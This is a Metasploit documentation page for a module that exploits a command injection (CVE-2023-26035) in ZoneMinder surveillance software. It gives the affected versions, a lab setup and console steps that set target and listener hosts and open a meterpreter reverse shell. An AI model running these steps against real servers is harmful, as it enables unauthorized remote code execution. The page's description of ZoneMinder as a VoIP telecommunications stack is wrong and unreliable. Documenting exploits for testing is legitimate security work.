Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
Views: 11789
Description
This module exploits a command injection that leads to a remote execution in ZoneMinder surveillance software versions before 1.36.33 and before 1.37.33
More about the vulnerability detail: 2023-26035.
The module will automatically use cmd/linux/http/x64/meterpreter/reverse_tcp
payload.
The module will check if the target is vulnerable, by sending a sleep command.
Vulnerable Application
Zoneminder is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
This module has been tested successfully on Zoneminder versions:
1.36.31~64bit on Debian 11
Source and Installers
The 3rd party debian-repository has packages for the vulnerable versions(for example zoneminder=1.36.31-bullseye1)
Ansible Installation
This exploit was tested using a debian bullseye cloudimage with the following ansible-roles:
Zoneminder was deployed using the following playbook:
The following template-file("redir.j2") for apache2 redirects requests to the zoneminder subdirectory:
Verification Steps
Example steps in this format (is also in the PR):
Do:
use exploit/unix/webapp/zoneminder_snapshots
Do:
set RHOSTS [ips]
Do:
set LHOST [lhost]
Do:
run
You should get a shell.
Options
TARGETURI
Remote web path to the zoneminder installation (default: /zm/)
Scenarios
In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is 192.42.1.188.
Zoneminder 1.36.31-bullseye1
The following demo shows how to use the exploit with minimal settings: